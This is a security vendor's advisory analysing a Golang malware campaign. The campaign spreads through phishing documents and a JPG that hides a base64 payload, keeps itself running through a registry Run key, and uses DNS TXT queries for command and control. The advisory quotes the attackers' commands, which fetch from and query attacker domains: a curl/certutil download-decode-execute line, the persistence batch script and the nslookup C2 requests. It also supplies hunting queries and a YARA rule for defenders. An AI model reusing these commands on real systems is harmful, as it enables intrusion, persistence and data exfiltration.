Securonix Threat Labs Security Advisory: New Golang Attack Campaign GO#WEBBFUSCATOR Leverages Office Macros and James Webb Images to Infect Systems

By Securonix Threat Labs, Threat Research: D. Iuzvyk, T. Peck, O. Kolesnikov

Introduction

The Securonix Threat research team has recently identified a unique sample of a persistent Golang-based attack campaign tracked by Securonix as GO#WEBBFUSCATOR. The new campaign incorporates an equally interesting strategy by leveraging the infamous deep field image taken from the James Webb telescope and obfuscated Golang programming language payloads to infect the target system with the malware.

Golang-based malware is on the rise gaining popularity^[1] with APT groups such as Mustang Panda^[2]. There are a few reasons why we may be seeing these APTs move to the Go platform. First, Go binaries are much more difficult to analyze and reverse engineer compared to C++ or C# compiled binaries. Go is also very flexible when it comes to cross-platform support and compilation. Malware authors are able to compile code using a common codebase for multiple platforms such as Windows and *NIX operating systems.

Additionally, there are several prominent malware frameworks such as ColdFire and OffensiveGolang designed to produce Go-based malware and executables.

Analysis — initial compromise

Initial infection begins with a phishing email containing a Microsoft Office attachment (Geos-Rates.docx in our case). The document includes an external reference hidden inside the document’s metadata which downloads a malicious template file.

As seen in the image below, the “Target=” field attempts to masquerade as a legitimate Microsoft URL to pull down the form.dotm file.

hxxp://www.xmlschemeformat.com/update/2021/Office/form.dotm  

A legitimate external reference should contain a URL patterned after:

http://schemas.openxmlformats.org/

When the document is opened, the malicious template file is downloaded and saved on the system. Similar to that of a traditional Office macro, the template file contains a VB script that will initiate the first stage of code execution for this attack once the user enables macros.

The malicious VBA macro code is set to be auto executed once macros are enabled. As with traditionally included macros, the template includes the functions Auto_Open, AutoOpen, and AutoExec.

After deobfuscating the VB code, we are left with the following code. We can see a reference to the same C2 server hosting the malicious Office template file.

The deobfuscated code executes the following command which will download a file named OxB36F8GEEC634.jpg, use certutil.exe to decode it into a binary (msdllupdate.exe) and then finally, execute it.

cmd.exe  /c cd c:userstestappdatalocal & curl hxxp://www[.]xmlschemeformat.com/update/2021/office/oxb36f8geec634.jpg -o oxb36f8geec634.jpg & certutil -decode oxb36f8geec634.jpg msdllupdate.exe & msdllupdate.exe

The image file is quite interesting. It executes as a standard .jpg image as seen in the image below. However, things get interesting when inspected with a text editor.

The image contains malicious Base64 code disguised as an included certificate. At the time of publication, this particular file is undetected by all antivirus vendors according to VirusTotal:

The Base64 encoded payload is decrypted and saved into a built Windows executable file called “msdllupdate.exe” as we saw earlier with the certutil command.

Below is a screenshot of the appended Base64 code which gets translated into the msdllupdate.exe Golang binary file.

Analysis — Golang binary

The generated file is a Windows 64-bit executable which is on the large size, standing at around 1.7MB. The binary msdllupdate.exe employs several obfuscation techniques in order to hide execution AV and to make analysis difficult.

ROT25 strings

We encountered many strings obfuscated using ROT25. This encoding method works like a traditional shift cipher where individual characters and numbers are rotated forward. For Instance, A = B, and 1 = 2 for ROT1. In this case ROT25, A = Z and 1 = 6.

The table below shows ROT25 strings we were able to extract:

XOR encoded payload

In addition to encoded strings using ROT25, the binary is compiled using the Go programming language and obfuscated using a modern technique aiding in counter forensics dubbed Gobfuscation.

The Golang assemblies were encoded using XOR with a 0x20 byte offset. Decrypting the obfuscated portion of the binary reveals the Golang assemblies.

As you can see in the figure below, the assemblies leverage a bit more obfuscation including case alteration to assist in bypassing AV signature detection.

While most of the file contents are obfuscated, dynamic analysis lets us observe additional behaviors. In order to establish persistence on the host, the malware will copy itself into %%localappdata%%microsoftvault and create and execute a batch file:

%%localappdata%%microsoftvaultupdate.bat 

This file contains the following content:

mkdir %LOCALAPPDATA%microsoftwindowsMsSafety

copy %localappdata%microsoftvaultMsdllupdate.exe  %LOCALAPPDATA%microsoftwindowsMsSafetyMsdllupdate.exe

reg add “HKCUSOFTWAREMicrosoftWindows NTCurrentVersionWindows” /V run /t REG_SZ /F /D %LOCALAPPDATA%microsoftwindowsMsSafetyMsdllupdate.exe

Persistence is achieved by adding an implant binary into the Windows registry Run key.

If the directory %localappdata%microsoftvault does not exist, the implant will not create it and persistence will be broken.

Analysis — C2 communication

When executed the malware was observed making unique DNS connections. By looking at the URL strings we can determine that the binary file was leveraging a DNS data exfiltration technique by sending unique DNS queries to a target C2 DNS server.

This technique works by sending an encrypted string appended to the DNS query set as a subdomain. We have observed similar behavior with DNS exfiltration tools such as DNSCAT2.

The encrypted messages are read in and unencrypted on the C2 server, thus revealing its original contents. This practice can be used for either establishing an encrypted channel for command and control, or exfiltrating sensitive data.

In the case with GO#WEBBFUSCATOR, communication with the C2 server is implemented using `TXT-DNS` requests using `nslookup` requests to the attacker-controlled name server. All information encoded using Base64

The first request sent to ReplaceWithRandom.C44352SSAWEQ.apiregis.com to check if c2 is active.

nslookup -q=txt -timeout=15 ReplaceWithRandom.C44352SSAWEQ.apiregis.com

If C2 is active, the implant will receive a USER_ID that will be used in all the following с2 connections. This user_id identifier will be written to the file:

%LOCALAPPDATA%microsoftvaultMsDb.db

The next step are four requests that are sent to the C2 server with following information:

• $processname|$hostname|$current userdomain|
  • example: Msdllupdate.exe|DESKTOP-PC|demodemo|
• ABC|network IP range|
  • Example: ABC|10.0.0.1/24|
• C:UsersuserAppData
• Localmicrosoftvault

Next, the implant will go into an infinitive loop waiting for commands from C2.

Three commands are supported:

• sleep to change timeout between C2 requests
• timeout to change timeout parameter in nslookup request
• all other commands will be executed with “cmd.exe /c”

In our case, we observed the malware leveraging nslookup using the following command structure:

c:windowssystem32cmd.exe /c “nslookup -q=txt -timeout=15 [USER_ID].[REDACTED].apiregis.com

Once the request is sent, a response is given:

c:windowssystem32cmd.exe /c “nslookup -q=txt -timeout=15 c1xqywxzdg[….]iagmdg6mdmgqu0gicag.[USER_ID].[REDACTED].apiregis.com

The first part of the URL string (beginning with c1xq) contained the encrypted payload. The next portion contains the USER_ID identified, and the last -contains the session identifier.

Once the DNS-based connection was established, we observed the attackers running arbitrary enumeration commands on our test systems.

Infrastructure analysis

The domain name www[.]xmlschemeformat.com was registered very recently on 2022-05-29 and resolved to 185.247.209.255 at 2022-05-30 12:26:36. At almost the same time this IP was set to point to ns1[.]updatesagent.com which was created on 2022-05-29.

The domain name ns2[.]updatesagent.com was registered on 2022-05-29.

The domain name apiregis[.]com contains no A records, however the subdomain ns1[.]apiregis.com and ns2[.]apiregis.com both resolve to 139.28.36.222 beginning on 2022-07-16.

Overall, domain age is very new which is typical for malicious C2 servers. One additional domain controlled by the threat actor was retrieved — updatesagent[.]com. This particular host allows for sending the same requests to the domain updatesagent[.]com as seen in the figure below.

We determined that the domain, updatesagent[.]com is designed to be a backup or fallback server.

Conclusion

Overall, TTPs observed with GO#WEBBFUSCATOR during the entire attack chain are quite interesting. Using a legitimate image to build a Golang binary with Certutil is not very common in our experience or typical and something we are tracking closely. It’s clear that the original author of the binary designed the payload with both some trivial counter-forensics and anti-EDR detection methodologies in mind.

WEBBFUSCATOR — MITRE ATT&CK techniques

GO#WEBBFUSCATOR — Indicators of compromise

Securonix recommendations and mitigations

• Avoid downloading unknown email attachments from non-trusted sources..
• Prevent Office products from spawning child processes using Microsoft’s recommendations
• Monitor for suspicious and persistent DNS queries and/or repeated nslookup requests.
• Scan endpoints using the Securonix seeder hunting queries below

Securonix detection policies

• EDR-ALL-730-ER,EDR-ALL-30-ER,CEDR-ALL-30-ER – Possible Phishing document – Rare process spawned from Office Applications
• EDR-ALL-79-ER Suspicious use of cradle – rare child process spawned from script interpreter
• EDR-ALL-185-ERI Potential use of suspicious stager – Rare destination port used by LOLBIN executable on host to establish outbound communication
• EDR-ALL-977-RU Potential Suspicious File Download With Certutil Process Analytic
• EDR-ALL-01-RU Decoding PE or DLL From b64 Via Certutil Analytic
• EDR-ALL-190-RU Possible Malicious Post-Exploitation Batch File CommandLine Analytic
• EDR-ALL-769-BP,EDR-ALL-69-BP,CEDR-ALL-69-BP Spike in number of Discovery Tactic Command Activity For Host Analytic
• EDR-ALL-1110-BP Potential DNS tunneling using NSlookup

Hunting queries

• rg_functionality = “Endpoint Management Systems” AND (deviceaction = “Process Create” OR deviceaction = “ProcessCreate” OR deviceaction = “Process Create (rule: ProcessCreate)” OR deviceaction = “ProcessRollup2” OR deviceaction = “SyntheticProcessRollUp2” OR deviceaction = “WmiCreateProcess” OR deviceaction = “Trace Executed Process” OR deviceaction = “Process” OR deviceaction = “Childproc” OR deviceaction = “Procstart” OR deviceaction = “Process Activity: Launched”) AND sourceprocessname ENDS WITH “Winword.exe” | rare destinationprocessname
• rg_functionality = “Endpoint Management Systems” AND (deviceaction = “Process Create” OR deviceaction = “ProcessCreate” OR deviceaction = “Process Create (rule: ProcessCreate)” OR deviceaction = “ProcessRollup2” OR deviceaction = “SyntheticProcessRollUp2” OR deviceaction = “WmiCreateProcess” OR deviceaction = “Trace Executed Process” OR deviceaction = “Process” OR deviceaction = “Childproc” OR deviceaction = “Procstart” OR deviceaction = “Process Activity: Launched”) AND destinationprocessname ENDS WITH “curl.exe” AND resourcecustomfield1 CONTAINS “http://”
• rg_functionality = “Endpoint Management Systems” AND (deviceaction = “Process Create” OR deviceaction = “ProcessCreate” OR deviceaction = “Process Create (rule: ProcessCreate)” OR deviceaction = “ProcessRollup2” OR deviceaction = “SyntheticProcessRollUp2” OR deviceaction = “WmiCreateProcess” OR deviceaction = “Trace Executed Process” OR deviceaction = “Process” OR deviceaction = “Childproc” OR deviceaction = “Procstart” OR deviceaction = “Process Activity: Launched”) AND destinationprocessname ENDS WITH “certutil.exe” AND resourcecustomfield1 CONTAINS “-urlcache” AND resourcecustomfield1 CONTAINS ” -f ” AND (resourcecustomfield1 CONTAINS “http://” OR resourcecustomfield1 CONTAINS “https://”)
• rg_functionality = “Endpoint Management Systems” AND (deviceaction = “Process Create” OR deviceaction = “ProcessCreate” OR deviceaction = “Process Create (rule: ProcessCreate)” OR deviceaction = “ProcessRollup2” OR deviceaction = “SyntheticProcessRollUp2” OR deviceaction = “WmiCreateProcess” OR deviceaction = “Trace Executed Process” OR deviceaction = “Process” OR deviceaction = “Childproc” OR deviceaction = “Procstart” OR deviceaction = “Process Activity: Launched”) AND destinationprocessname ENDS WITH “certutil.exe” AND (resourcecustomfield1 CONTAINS “.dll” OR resourcecustomfield1 CONTAINS “.exe”)
• rg_functionality = “Endpoint Management Systems” AND (deviceaction = “Process Create” OR deviceaction = “ProcessCreate” OR deviceaction = “Process Create (rule: ProcessCreate)” OR deviceaction = “ProcessRollup2” OR deviceaction = “SyntheticProcessRollUp2” OR deviceaction = “WmiCreateProcess” OR deviceaction = “Trace Executed Process” OR deviceaction = “Process” OR deviceaction = “Childproc” OR deviceaction = “Procstart” OR deviceaction = “Process Activity: Launched”) AND destinationprocessname ENDS WITH “reg.exe” AND resourcecustomfield2 CONTAINS “cmd” AND resourcecustomfield2 CONTAINS “/c” AND resourcecustomfield2 CONTAINS “.bat”
• rg_functionality = “Endpoint Management Systems” AND (deviceaction = “Process Create” OR deviceaction = “ProcessCreate” OR deviceaction = “Process Create (rule: ProcessCreate)” OR deviceaction = “ProcessRollup2” OR deviceaction = “SyntheticProcessRollUp2” OR deviceaction = “WmiCreateProcess” OR deviceaction = “Trace Executed Process” OR deviceaction = “Process” OR deviceaction = “Childproc” OR deviceaction = “Procstart” OR deviceaction = “Process Activity: Launched”) AND destinationprocessname ENDS WITH “nslookup.exe” AND resourcecustomfield1 CONTAINS ” -q=txt “

Yara rules:

rule Go_WEBB_Implant {

    meta:

      description = “Go WEBB Implant”

      author = “Securonix Threat Research”

      reference = “https://www.securonix.com/<SECURONIX_ICA_URL_HERE>.pdf”

      date = “2022-08-08”

      hash1 = “d09af37cdbae7273e4e7c79b242023ffdb07c8ccab2280db7fe511d2b14ad19c”

      strings:

        $hex_string1 = {6F 74 6D 70 70 6C 76 71 21 2E 72 3E 75 79 75 21 2E 75 6A 6E 66 70 76 75 3E}

        $hex_string2 = {4E 74 65 6D 6D 76 71 65 62 75 66 2F 66 79 66}

        $hex_string3 = {4E 74 45 63 2F 65 63}

        $hex_string4 = {53 66 71 6D 62 64 66 58 6A 75 69 53 62 6F 65 70 6E} 

      condition:

        uint16(0) == 0x5a4d and filesize < 2MB and all of ($hex_string*)

}

References